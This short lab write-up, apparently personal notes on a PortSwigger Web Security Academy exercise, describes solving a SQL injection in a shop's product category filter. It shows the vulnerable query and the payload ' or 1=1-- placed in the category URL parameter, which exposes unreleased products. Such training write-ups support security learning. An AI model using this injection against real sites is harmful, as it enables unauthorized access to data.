This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

https://0aca0089049c37728097175e00b9006c.web-security-academy.net

https://0aca0089049c37728097175e00b9006c.web-security-academy.net/filter?category=Accessories

As the vulnerability is in the product category filter, we can try something like:

/filter?category=' or 1=1--

https://0aca0089049c37728097175e00b9006c.web-security-academy.net/filter?category=%27%20or%201=1–

Now we can observe that there are more articles available in the shop.

burpSuiteAcademy